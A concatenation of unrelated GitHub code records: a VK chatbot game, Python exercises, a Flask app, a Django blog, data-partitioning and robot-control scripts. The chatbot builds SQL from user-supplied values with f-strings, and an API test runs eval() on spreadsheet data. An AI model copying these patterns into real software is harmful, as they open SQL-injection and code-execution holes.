player.room == 2:\n if text == 'Империя':\n player.country = 'Империя'\n player.location = 1\n player.room = 3\n writing('Выбери расу', user_id, keyboards_main.keyboard_1)\n elif text == 'Королевство':\n player.country = 'Королевство'\n player.location = 2\n player.room = 3\n writing('Выбери расу', user_id, keyboards_main.keyboard_1)\n else:\n writing('Некорректное значение, выбери страну.', user_id,\n keyboards_main.keyboard_0)\n elif player.room == 3:\n if text == 'Эльф':\n player.race = 'Эльф'\n player.room = 4\n writing('переходим в основную игру', user_id, keyboards_main.keyboard_2)\n elif text == 'Гном':\n player.race = 'Гном'\n player.room = 4\n writing('переходим в основную игру', user_id, keyboards_main.keyboard_2)\n else:\n writing('Некорректное значение, выбери расу.', user_id,\n keyboards_main.keyboard_1)\n elif player.room == 4:\n if text == 'Продолжить':\n sql_connect.db_connection_insert(f'INSERT users (name, vk_id, country, race, '\n f'location_id) VALUES (\"{player.name}\", '\n f'{player.vk_id}, \"{player.country}\",'\n f'\"{player.race}\", 
{player.location});')\n for i in range(len(list_of_players_id)):\n if list_of_players_id[i] == user_id:\n list_of_players_id.pop(i)\n for i in range(len(players)):\n if players[i].vk_id == user_id:\n players.pop(i)\n else:\n if player.part == 'main':\n if player.room == 1:\n if text == 'Карта':\n player.part = 'map'\n writing(\"Герой зашёл в карту\", user_id, keyboards_main.keyboard_5)\n elif text == 'Инвентарь':\n player.part = 'inventory'\n writing(\"Герой зашёл в инвентарь\", user_id, keyboards_main.keyboard_4)\n elif text == \"Магазин\":\n writing_only_text('Герой зашёл в магазин. \\n', user_id)\n shop(player.id, user_id)\n else:\n writing('Некорректное значение, выбери пункт меню.', user_id,\n keyboards_main.keyboard_3)\n elif player.part == 'shop':\n if player.room == 1:\n if text == 'Меню':\n writing(\"Основная страница героя, меню\", user_id, keyboards_main.keyboard_3)\n player.part = 'main'\n else:\n for line in shop_request(player.id):\n if text == line[0]:\n buying_ammunition(player.id, text, user_id)\n\n shop(player.id, user_id)\n elif player.part == 'inventory':\n if player.room == 1:\n if text == 'Меню':\n writing(\"Основная страница героя, меню\", user_id, keyboards_main.keyboard_3)\n player.part = 'main'\n elif text == 'Оружие':\n return_ammunition_text(player.id, user_id)\n else:\n writing('Некорректное значение, выбери пункт меню.', user_id,\n keyboards_main.keyboard_4)\n elif player.part == 'map':\n if player.room == 1:\n if text == 'Меню':\n writing(\"Основная страница героя, меню\", user_id, keyboards_main.keyboard_3)\n player.part = 'main'\n elif text == 'Квест':\n ls, w_str = methods.quests_list(user_id, player.id)\n writing(w_str, user_id, keyboards_main.new_keyboard(ls))\n player.part = 'quest'\n else:\n writing('Некорректное значение, выбери пункт меню.', user_id,\n keyboards_main.keyboard_5)\n elif player.part == 'quest':\n if player.room == 1:\n if text == '':\n pass\n else:\n writing('Некорректное значение, выбери пункт меню.', user_id,\n keyboards_main.keyboard_5)\n else:\n var_1 = 0\n for i in range(len(players)):\n if time.time() - players[i - var_1].mem_time >= 300:\n sql_connect.db_connection_insert(f'UPDATE users SET level_ = {players[i - var_1].level}, '\n f'location_id = {players[i - var_1].location_id}, experience = '\n f'{players[i - var_1].experience}, money = '\n f'{players[i - var_1].money} WHERE id = {players[i - var_1].id};')\n print(f'Удаляем игрока {players[i - var_1].name} из оперативной памяти')\n list_of_players_id.remove(players[i - var_1].vk_id)\n players.pop(i - var_1)\n print(players)\n print(list_of_players_id)\n var_1 += 1\n except vk_api.exceptions.ApiError or ConnectionError or vk_api.exceptions.ApiHttpError:\n pass\n","repo_name":"3ovutVanja/ChatBotGameFantasy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16300,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"23973795946","text":"# 3. Узнайте у пользователя число n.\n# Найдите сумму чисел n + nn + nnn.\n# Например, пользователь ввёл число 3. Считаем 3 + 33 + 333 = 369.\n\nnumber = input(\"Введите цифру от 0 до 9: \")\ntry:\n if int(number) in range(10):\n print(int(number) + int(number * 2) + int(number * 3))\n else:\n print(\"Введенная цифра больше вне диапазона от 0 до 9. Попробуйте еще раз\")\nexcept:\n print(\"Вы ввели не цифру. Попробуйте еще раз\")\n","repo_name":"MA32021/gbPythonBasics","sub_path":"Lesson_1_3.py","file_name":"Lesson_1_3.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"16355145574","text":"# -*- coding: utf-8 -*-\n# @Time : 2022/3/14 17:05\n# @Author : kl\n# @File : test_register.py\nimport os\nimport ddt\nimport unittest\nimport requests\nfrom tools.HandleExcel import HandleExcel\nfrom tools.handle_path import testdatas_dir\nfrom tools.handle_requests import HandleRequests\nfrom tools.hand_log import HandleLog\n\nexcel_path = os.path.join(testdatas_dir, \"cases.xlsx\")\nhe = HandleExcel(excel_path,\"注册\")\ndatas = he.read_all_rows_data()\nprint(datas)\nlogger = HandleLog()\n\n@ddt.ddt\nclass TestRegister(unittest.TestCase):\n name = \"注册\"\n\n @classmethod\n def setUpClass(cls) -> None:\n logger.info(f\"============= {cls.name} 接口测试开始! ==============\")\n\n @classmethod\n def tearDownClass(cls) -> None:\n logger.info(f\"============= {cls.name} 接口测试结束! ==============\")\n\n @ddt.data(*datas)\n def test_register_success(self, case):\n logger.info(f\"********* {case.get('title')} 用例 ********\")\n hr = HandleRequests()\n resp = hr.send_req(case[\"method\"], case[\"url\"], eval(case['req_data']))\n res_dict = resp.json()\n print(res_dict)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"kuanglei1986/lemon","sub_path":"0308/testcases/test_register.py","file_name":"test_register.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"69929232576","text":"from flask import Flask,request,render_template\nfrom graduation_project.web_app.form import Start_Form\nfrom graduation_project.web_app.redis_queue import Queue\napp = Flask(__name__)\napp.secret_key='renjian'\nqueue=Queue()\n\n# @app.route('/')\n# def index():\n# return render_template('start_crawl.htm')\n\n\n\n@app.route('/hello')\ndef hello():\n return 'Hello World'\n\n\n# @app.route('/login', methods=['POST', 'GET'])\n# def login():\n# error = None\n# if request.method == 'POST':\n# if valid_login(request.form['username'],\n# request.form['password']):\n# return log_the_user_in(request.form['username'])\n# else:\n# error = 'Invalid username/password'\n# # the code below is executed if the request method\n# # was GET or the credentials were invalid\n# return render_template('login.html', error=error)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef login():\n form = Start_Form()\n if form.validate_on_submit():\n start_data=form.data['start_data']\n if form.data['start_data']:\n queue.push(start_data)\n return 'sucess,your data is %s'%start_data\n else:\n return 'not data'\n return render_template('start_crawl.htm', form=form)\n\n\n\n@app.route('/user/')\ndef show_user_profile(username):\n # show the user profile for that user\n return 'User %s' % username\n\n\n# @app.route('/login', methods=['GET', 'POST'])\n# def login():\n# if request.method == 'POST':\n# do_the_login()\n# else:\n# show_the_login_form()\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"cdrenjian/graduation_project","sub_path":"web_app/crawl_app.py","file_name":"crawl_app.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39896201919","text":"# Function creates a new NTE, notes segment and moves the\r\n# information in TXA 13 to field three of the NTE segment\r\n\r\ndef update_nte_3(json_in):\r\n\r\n for (s, value) in json_in.items():\r\n if s.startswith('TXA')and len(json_in[s]['13']) > 0:\r\n nte = {'1': \"\", '2': \"\", '3': json_in[s]['13'], '4': \"\"}\r\n json_in.update({'NTE.'+str(len(json_in)): nte})\r\n break\r\n\r\n return json_in\r\n","repo_name":"jsdavis02/mft_hl7_oasis_components","sub_path":"oasis_fun/update_nte_3.py","file_name":"update_nte_3.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39507015249","text":"# 213. House Robber II\n# https://leetcode.com/problems/house-robber-ii/description/\n\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n\n return max(nums[0], self.dynamic(nums[:-1]), self.dynamic(nums[1:]))\n\n\n def dynamic(self, nums):\n rob1, rob2 = 0, 0\n\n\n for n in nums:\n temp = max(rob1 + n, rob2)\n rob1 = rob2\n rob2 = temp\n\n return rob2\n \n \n \n# Example 1:\n\n# Input: nums = [2,3,2]\n# Output: 3\n# Explanation: You cannot rob house 1 (money = 2) and then rob house 3 (money = 2), because they are adjacent houses.\n \n \n# Example 2:\n\n# Input: nums = [1,2,3,1]\n# Output: 4\n# Explanation: Rob house 1 (money = 1) and then rob house 3 (money = 3).\n# Total amount you can rob = 1 + 3 = 4.\n","repo_name":"anoopanni/leetcode","sub_path":"HourseRobber2.py","file_name":"HourseRobber2.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"21202350823","text":"# Code for whole NA domain using Kao's dataset\nimport os \nimport netCDF4 as nc\nimport numpy as np\nfrom itertools import cycle\nfrom pprint import pprint\nfrom time import process_time \n\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ninput_path= '/home/7xw/data/GWSP3_DayMet/2014NA'\nfile_name = '/home/7xw/data/GWSP3_DayMet/2014NA/clmforc.Daymet4.1km.FSDS.2014-01.nc'\n\nvis =0 \ndebug = 1\nsave_memory = 1\n\nnumber_of_subdomains = 4200 # 4200 for 700 Summit nodes\ni_timesteps = 248 # 248 for 31 days\n\nstart = process_time()\n# Open a new NetCDF file to write the data to. For format, you can choose from\n# 'NETCDF3_CLASSIC', 'NETCDF3_64BIT', 'NETCDF4_CLASSIC', and 'NETCDF4'\nr_nc_fid = nc.Dataset(file_name, 'r', format='NETCDF4')\n\ntotal_rows = r_nc_fid.dimensions['x'].size\ntotal_cols = r_nc_fid.dimensions['y'].size\ntotal_timesteps = r_nc_fid.dimensions['time'].size\n\n\nFSDS = r_nc_fid['FSDS'][0:i_timesteps, :, :] # read (timestep, y, x) format\n#FSDS = FSDS.transpose(0,2,1) # change to (time, x,y) format\nend = process_time()\nprint(\"Reading FSDS takes {}\".format(end-start))\n\nif vis :\n x = np.linspace(1, total_rows, total_rows, dtype=int)\n y = np.linspace(1, total_cols, total_cols, dtype=int)\n fig, ax = plt.subplots(subplot_kw={'projection': '3d'})\n X,Y = np.meshgrid(x, y)\n ax.view_init(90,0)\n ax.plot_wireframe(Y, X, FSDS[0])\n plt.show()\n\n# Create a global ID for ALL the gridcells\n\nstart = process_time()\ntotal_gridcells = total_rows * total_cols\ngrid_ids = np.linspace(0, total_gridcells-1, total_gridcells, dtype=int)\n\n# create a mask for land grid_ids (1)\nmask = FSDS[0] # FSDS is in (time, Y, X) format\nmask = np.where(~np.isnan(mask), 1, 0)\n\n# create an flattened list of land gridID and reduce the size of gridIDs array\ngrid_ids = grid_ids.reshape(total_cols,total_rows)\ngrid_ids = np.multiply(mask,grid_ids)\ngrid_ids = grid_ids[grid_ids != 0]\n\nend = process_time()\nprint(\"Generate Grid_id takes {}\".format(end-start))\n\n# use the size of land gridcells to resize the FSDS matrix\nstart = process_time()\nlandcells = len(grid_ids)\nif debug:\n print('number of land cells is '+str(landcells))\n \nFSDS=FSDS[~np.isnan(FSDS)]\nFSDS = np.reshape(FSDS,(i_timesteps,landcells))\n\nend = process_time()\nprint(\"Creating dense FSDS takes {}\".format(end-start))\n\n\nstart = process_time()\n# partition landcells into subdomains\n# number_of_subdomains = 4200 # 4200 for 700 Summit nodes\n\n# cyclic (round-robin) partition\ndomains = [[] for _ in range(number_of_subdomains)]\nfor element, domain in zip(grid_ids, cycle(domains)):\n domain.append(element)\n\n#for i in range(number_of_subdomains):\n# # convert local gridID-list into array\n# grid_id_arr[i] = np.array(domains[i]) \ngrid_id_domains = domains.copy()\n\n# partition the FSDS over landcells\n# landcell_idx is alse the column_idx of FSDS\nlandcell_idx = np.linspace(0, landcells-1, landcells, dtype=int)\n\ndomains = [[] for _ in range(number_of_subdomains)]\nfor element, domain in zip(landcell_idx, cycle(domains)):\n domain.append(element)\n \n# save the boundaries of each subdomain (for array_split)\nsize_of_subdomains = [ len(domain) for domain in domains]\n\n# partitioned landcells_idx in subdomains \narranged_grid_idx = np.concatenate(domains).ravel()\nprint(arranged_grid_idx)\n# find the original index of landcells for column swap\nnp.sort(arranged_grid_idx)\ngrid_swap_idx = (np.argsort(arranged_grid_idx))\n\n# create swap index and arrange 
FSDS\nidx = np.empty_like(grid_swap_idx)\nidx[grid_swap_idx] = np.arange(len(grid_swap_idx))\nFSDS = FSDS[:,idx]\n\nend = process_time()\nprint(\"Partitioning FSDS/GridID takes {}\".format(end-start))\n","repo_name":"daliwang/DaymetDataUtilities","sub_path":"partition_3rd_swap.py","file_name":"partition_3rd_swap.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
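The tail of the record above round-robins column indices into subdomains and then reorders FSDS through a double inversion: the argsort of a permutation is its inverse, so inverting that again just recovers the permutation itself. A small self-checking sketch with toy sizes (not the 1 km NA grid):

    import numpy as np
    from itertools import cycle

    def round_robin(items, k):
        # deal items into k bins like a deck of cards
        bins = [[] for _ in range(k)]
        for item, b in zip(items, cycle(bins)):
            b.append(item)
        return bins

    order = np.concatenate(round_robin(np.arange(6), 2))  # [0 2 4 1 3 5]
    data = np.arange(12).reshape(2, 6)  # toy (time, landcell) matrix

    swap = np.argsort(order)            # inverse of `order`
    idx = np.empty_like(swap)
    idx[swap] = np.arange(len(swap))    # inverse of `swap`, i.e. `order` again
    assert np.array_equal(data[:, idx], data[:, order])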
+{"seq_id":"28606680639","text":"from django.contrib.auth import login, logout\nfrom django.contrib.auth.views import LoginView\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import ListView, DetailView, CreateView\nfrom django.views.generic.base import View\nfrom django.core.paginator import Paginator\n\nfrom django.contrib import messages\nfrom transliterate import slugify\n\nfrom .models import *\nfrom .forms import *\n\n\ndef index(request):\n    if request.user.is_authenticated:\n        return redirect('/rec_article/')\n    return redirect('/all_articles/')\n\n\nclass AllArticles(ListView):\n    # View for the main page listing all articles\n    paginate_by = 10\n    model = Article\n    template_name = 'Blog/index.html'\n    context_object_name = 'articles'\n    queryset = Article.objects.all().order_by('-pk')\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['title'] = 'Home page'\n        context['head'] = 'All articles'\n\n        return context\n\n\nclass RecArticle(View):\n    # View for the main page with recommended articles\n    def get(self, request):\n        # Collect the recommended articles\n        subscribe_article = MarkedArticle.objects.filter(subscribe_to_post=True, showing_to_user=request.user)\n        recommended_articles = Article.objects.none()\n\n        if subscribe_article.exists():\n            for i in subscribe_article:\n                recommended_articles = recommended_articles.union(\n                    Article.objects.filter(author=i.article.author, time_create__gte=i.time_subscribe_to_post)\n                )\n            recommended_articles = recommended_articles.order_by('-time_create')\n            head = 'Your recommendations'\n            paginator = Paginator(recommended_articles, 10)\n            page_number = request.GET.get('page')\n            page_obj = paginator.get_page(page_number)\n\n        else:\n            head = 'You have not subscribed to any article'\n            page_obj = None\n\n        context = {\n            'page_obj': page_obj,\n            'title': 'Recommendations',\n            'head': head\n        }\n        return render(request, 'Blog/index.html', context=context)\n\n\nclass ReadArticle(View):\n    # View for the read articles on the main page\n\n    def get(self, request):\n        # Collect the articles the user has read\n        articles_read = ReadTheArticle.objects.filter(showing_to_user=self.request.user)\n        articles_read_user = Article.objects.none()\n        if articles_read.exists():\n            for i in articles_read:\n                articles_read_user = articles_read_user.union(Article.objects.filter(pk=i.article.pk))\n\n        if articles_read_user.exists():\n            head = 'Read articles'\n            paginator = Paginator(articles_read_user, 10)\n            page_number = request.GET.get('page')\n            page_obj = paginator.get_page(page_number)\n        else:\n            head = 'You have not read any article'\n            page_obj = None\n\n        context = {\n            'page_obj': page_obj,\n            'title': 'Read articles',\n            'head': head\n        }\n        return render(request, 'Blog/index.html', context=context)\n\n\nclass Author(ListView):\n    # View for the users page with their post counts\n    model = CountArticleUser\n    template_name = 'Blog/authors.html'\n    context_object_name = 'count_article_user'\n    queryset = CountArticleUser.objects.all().order_by('author')\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['sort_form'] = SortAutorForm()\n        context['title'] = 'Users'\n        return context\n\n\nclass SortListUser(View):\n    # View for the users page sorted by post count or by author\n    def post(self, request):\n        sort_form = SortAutorForm(request.POST)\n        count_article_user = CountArticleUser.objects.all()\n        if sort_form.is_valid():\n            needed_sort = sort_form.cleaned_data.get(\"sort_autor_form\")\n            # the choice values below are the ones defined in SortAutorForm\n            if needed_sort == \"количество\":\n                count_article_user = count_article_user.order_by(\"-count\")\n            elif needed_sort == \"автор\":\n                count_article_user = count_article_user.order_by(\"author\")\n        context = {\n            'sort_form': sort_form,\n            'count_article_user': count_article_user,\n            'title': 'Users'\n        }\n        return render(request, 'Blog/authors.html', context=context)\n\n\nclass ShowArticleAuthor(DetailView):\n    # View for a user's page with the articles they have written\n    model = User\n    template_name = 'Blog/author_detail.html'\n    context_object_name = 'user'\n    pk_url_kwarg = 'user_id'\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['title'] = f'Posts by user {kwargs[\"object\"]}'\n        context['article'] = Article.objects.filter(author=kwargs['object']).order_by('-time_create')\n\n        return context\n\n\nclass ShowArticle(DetailView):\n    # View for a single article\n    model = Article\n    template_name = 'Blog/article_detail.html'\n    context_object_name = 'article'\n    slug_url_kwarg = 'article_slug'\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['title'] = f'Post {context[\"article\"]}'\n        a = Article.objects.get(slug=context[\"article\"].slug)\n        try:\n            context['marked_article'] = MarkedArticle.objects.get(showing_to_user=self.request.user, article=a)\n        except MarkedArticle.DoesNotExist:\n            context['marked_article'] = None\n\n        try:\n            context['read_the_article'] = ReadTheArticle.objects.get(showing_to_user=self.request.user, article=a)\n        except ReadTheArticle.DoesNotExist:\n            context['read_the_article'] = None\n\n        return context\n\n\ndef sub_from_post(request, article_slug):\n    MarkedArticle.objects.create(\n        article=Article.objects.get(slug=article_slug), showing_to_user=request.user, subscribe_to_post=True\n    )\n\n    return redirect(f'/article/{article_slug}/')\n\n\ndef unsub_from_post(request, article_slug):\n    a = Article.objects.get(slug=article_slug)\n    unsub = MarkedArticle.objects.get(showing_to_user=request.user, article=a)\n    unsub.delete()\n\n    return redirect(f'/article/{article_slug}/')\n\n\ndef mark_as_read(request, article_slug):\n    ReadTheArticle.objects.create(\n        article=Article.objects.get(slug=article_slug), showing_to_user=request.user\n    )\n\n    return redirect(f'/article/{article_slug}/')\n\n\ndef remove_the_mark(request, article_slug):\n    a = Article.objects.get(slug=article_slug)\n    remove_mark = ReadTheArticle.objects.get(showing_to_user=request.user, article=a)\n    remove_mark.delete()\n\n    return redirect(f'/article/{article_slug}/')\n\n\nclass AddArticlePage(View):\n    def get(self, request):\n        form = AddArticleForm()  # an unbound form for the GET request\n        context = {\n            'title': 'Add article',\n            'form': form\n        }\n        return render(request, 'Blog/add_article.html', context)\n\n\nclass AddArticle(View):\n    def post(self, request):\n        form = AddArticleForm(request.POST)\n        if form.is_valid():\n            add_article = form.save(commit=False)\n            add_article.title = form.cleaned_data['title']\n            add_article.content = form.cleaned_data['content']\n            add_article.author = request.user\n            add_article.slug = slugify(form.cleaned_data['title'])\n            add_article.save()\n\n            cau = CountArticleUser.objects.get(author=request.user)\n            cau.count += 1\n            cau.save()\n\n            # only report success when the form actually validated\n            messages.add_message(request, messages.INFO, \"The article was added successfully!\")\n        return HttpResponseRedirect('/')\n\n\nclass RegisterUser(CreateView):\n    form_class = RegisterUserForm\n    template_name = 'Blog/register.html'\n    success_url = reverse_lazy('authors')\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['title'] = \"Registration\"\n\n        return context\n\n    def form_valid(self, form):\n        user = form.save()\n        login(self.request, user)\n        CountArticleUser.objects.create(\n            author=self.request.user, count=0\n        )\n        return redirect('index')\n\n\nclass LoginUser(LoginView):\n    form_class = LoginUserForm\n    template_name = 'Blog/login.html'\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['title'] = 'Login'\n        return context\n\n    def get_success_url(self):\n        return reverse_lazy('index')\n\n\ndef logout_user(request):\n    logout(request)\n    return redirect('login')\n","repo_name":"TriplG/WB-Tech","sub_path":"Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"13456796861","text":"# 57-WAP to swap the values of two variables that are defined as global variables\nfn, sn = 5, 18\n\ndef swap():\n    global fn, sn\n    temp = fn\n    fn = sn\n    sn = temp\n    print(\"After Swapping:\\n First Num={} and Second Num={}\".format(fn, sn))\n\nswap()","repo_name":"faiz1675/Python-Programs","sub_path":"LabFile/57-funSwap.py","file_name":"57-funSwap.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
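The swap above spells out the classic temp-variable dance; Python's tuple unpacking does the same exchange in one step. A minimal sketch of the equivalent program:

fn, sn = 5, 18

def swap():
    global fn, sn
    # tuple unpacking swaps both names atomically, no temp needed
    fn, sn = sn, fn
    print("After Swapping:\n First Num={} and Second Num={}".format(fn, sn))

swap()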
+{"seq_id":"34597808291","text":"import difflib\nimport html.parser\nimport itertools\nimport operator\nimport sys\n\nclass Parser(html.parser.HTMLParser):\n    def __init__(self, *args, **kargs):\n        html.parser.HTMLParser.__init__(self, *args, **kargs)\n        self.avoid_collisions_nodes = []\n\n    def handle_starttag(self, tag, attrs):\n        attrs = \" \".join([\"=\".join([a, '\"%s\"' % b]) for a, b in attrs])\n        node = (\"<%s %s>\" % (tag, attrs)) if attrs else (\"<%s>\" % tag)\n        self.avoid_collisions_nodes.append(node)\n\n    def handle_endtag(self, tag):\n        node = \"</%s>\" % tag\n        self.avoid_collisions_nodes.append(node)\n\n    def handle_data(self, data):\n        if self.avoid_collisions_nodes:\n            if not self.avoid_collisions_nodes[-1].startswith(\"<\"):\n                self.avoid_collisions_nodes[-1] += data\n                return\n        self.avoid_collisions_nodes.append(data)\n\n    def handle_entityref(self, name):\n        self.handle_data(\"&%s;\" % name)\n\n    def handle_charref(self, name):\n        self.handle_data(\"&%s;\" % name)\n\ndef character_data(node):\n    return not node.startswith(\"<\")\n\ndef content(line):\n    return line[2:]\n\ndef out(text):\n    # http://stackoverflow.com/questions/4601912\n    sys.stdout.flush()\n    sys.stdout.buffer.write(text.encode(\"utf-8\"))\n\ndef lines(old, new):\n    delta = difflib.ndiff(old, new)\n\n    # NOTE: the markup strings this function originally emitted were stripped\n    # from this copy of the file; the <ins>/<del> wrappers below are assumed\n    # reconstructions of the lost tags.\n    first = operator.itemgetter(0)\n    for item, group in itertools.groupby(delta, first):\n        if item == \"?\":\n            continue\n\n        group = [content(line) for line in group]\n        cdata = any(map(character_data, group))\n\n        if cdata:\n            if item == \"+\":\n                out(\"<ins>\")\n            elif item == \"-\":\n                out(\"<del>\")\n\n        if cdata or (item != \"-\"):\n            for line in group:\n                out(line)\n\n        if cdata:\n            if item == \"+\":\n                out(\"</ins>\")\n            elif item == \"-\":\n                out(\"</del>\")\n\ndef files(a, b):\n    parser_a = Parser()\n    with open(a, \"rb\") as f:\n        for line in f:\n            try:\n                line = line.decode(\"utf-8\")\n            except UnicodeDecodeError:\n                continue\n            parser_a.feed(line)\n    old = parser_a.avoid_collisions_nodes\n\n    parser_b = Parser()\n    with open(b, \"rb\") as f:\n        for line in f:\n            try:\n                line = line.decode(\"utf-8\")\n            except UnicodeDecodeError:\n                continue\n            parser_b.feed(line)\n    new = parser_b.avoid_collisions_nodes\n\n    lines(old, new)\n\n","repo_name":"sbp/orinoco","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
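For reference, this is the shape of what difflib.ndiff hands to lines() above: each yielded line carries a two-character prefix that the itertools.groupby call keys on. A small sketch:

import difflib

# '  ' = common line, '- ' = only in old, '+ ' = only in new,
# '? ' = intraline hint (skipped by lines() above)
for line in difflib.ndiff(["<p>", "old text", "</p>"], ["<p>", "new text", "</p>"]):
    print(repr(line))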
+{"seq_id":"37175753741","text":"from django.core.exceptions import ValidationError\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nfrom django.db import models\nfrom .customer import Customer, validate_balance\n\n\nclass BalanceWriteOff(models.Model):\n    \"\"\"\n    Model related Many-To-Many with the Customer model.\n    Contains information about the customer balance write-offs.\n    It includes:\n        customer: foreign key to the Customer model; the customer whose\n            ucoins were written off.\n            related_name - incoming_balance_write_offs_set\n        from_customer: foreign key to the Customer model; the customer\n            who performed the write-off.\n            related_name - outgoing_balance_write_offs_set\n        count: float field, contains the count of ucoins\n            that were written off the balance.\n        header: string field with max_length = 100.\n        comment: string field with max_length = 250.\n        date: datetime field.\n    \"\"\"\n    customer = models.ForeignKey(Customer, on_delete=models.CASCADE,\n                                 related_name=\"incoming_balance_write_offs_set\")\n    from_customer = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True,\n                                      help_text=\"The customer who wrote the ucoins off the balance.\",\n                                      related_name=\"outgoing_balance_write_offs_set\")\n    # count = models.PositiveIntegerField(default=0, null=False)\n    count = models.FloatField(\n        default=0.0,\n        validators=[\n            validate_balance,\n            MaxValueValidator(9999.9),\n            MinValueValidator(0.0)\n        ],\n        null=False\n    )\n    header = models.CharField(max_length=100, null=False, blank=False, default=\"Write-off\")\n    comment = models.CharField(max_length=250, null=False, blank=True, default=\"\")\n    date = models.DateTimeField(auto_now_add=True)\n\n    type = \"write_off\"\n\n    class Meta:\n        verbose_name = \"Balance write-off\"\n        verbose_name_plural = \"Balance write-offs\"\n        ordering = [\"-date\"]\n\n    def __str__(self):\n        return f\"Write-off of {self.count} from the account of user {self.customer.name()}\"\n\n    def customer_name(self):\n        return self.customer.name()\n\n    def from_customer_name(self):\n        if self.from_customer:\n            return self.from_customer.name()\n        return None\n\n    def save(self, *args, **kwargs):\n        try:\n            self.customer.decrease_balance(self.count)\n        except ValidationError as err:\n            raise err\n        else:\n            super(BalanceWriteOff, self).save(*args, **kwargs)\n","repo_name":"DevCrusader/UStoreAPI","sub_path":"project/customer/models/balance_write_off.py","file_name":"balance_write_off.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"30643734343","text":"import RPi.GPIO as GPIO\n\nclass Motor:\n def __init__(self, en, in1, in2):\n self.EN = en\n self.IN1 = in1\n self.IN2 = in2\n\n GPIO.setup([self.EN, self.IN1, self.IN2], GPIO.OUT, initial=GPIO.LOW)\n\n def stop(self):\n GPIO.output([self.EN, self.IN1, self.IN2], GPIO.LOW)\n\n def forward(self):\n GPIO.output([self.EN, self.IN1], GPIO.HIGH)\n GPIO.output(self.IN2, GPIO.LOW)\n\n def backward(self):\n GPIO.output([self.EN, self.IN2], GPIO.HIGH)\n GPIO.output(self.IN1, GPIO.LOW)\n\nclass Robot:\n def __init__(self):\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n\n self.left_motor = Motor(32, 38, 40)\n self.right_motor = Motor(33, 37, 35)\n\n self.steering = \"fw\"\n self.direction = \"stopped\"\n\n def __del__(self):\n self.stop()\n try:\n GPIO.cleanup()\n except Exception as e:\n print(\"Cleanup failed\")\n print(e)\n\n def move(self):\n if self.direction == \"fw\":\n if self.steering == \"fw\":\n self.left_motor.forward()\n self.right_motor.forward()\n elif self.steering == \"left\":\n self.right_motor.forward()\n self.left_motor.stop()\n else:\n self.left_motor.forward()\n self.right_motor.stop()\n elif self.direction == \"bw\":\n if self.steering == \"fw\":\n self.left_motor.backward()\n self.right_motor.backward()\n elif self.steering == \"left\":\n self.left_motor.backward()\n self.right_motor.stop()\n else:\n self.right_motor.backward()\n self.left_motor.stop()\n else:\n self.left_motor.stop()\n self.right_motor.stop()\n\n def no_steering(self):\n self.steering = \"fw\"\n self.move()\n\n def stop(self):\n self.direction = \"stopped\"\n self.move()\n\n def forward(self):\n self.direction = \"fw\"\n self.move()\n\n def backward(self):\n self.direction = \"bw\"\n self.move()\n\n def right(self):\n self.steering = \"right\"\n self.move()\n\n def left(self):\n self.steering = \"left\"\n self.move()\n","repo_name":"Jostyck9/remote-robot-surveillance","sub_path":"robot/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
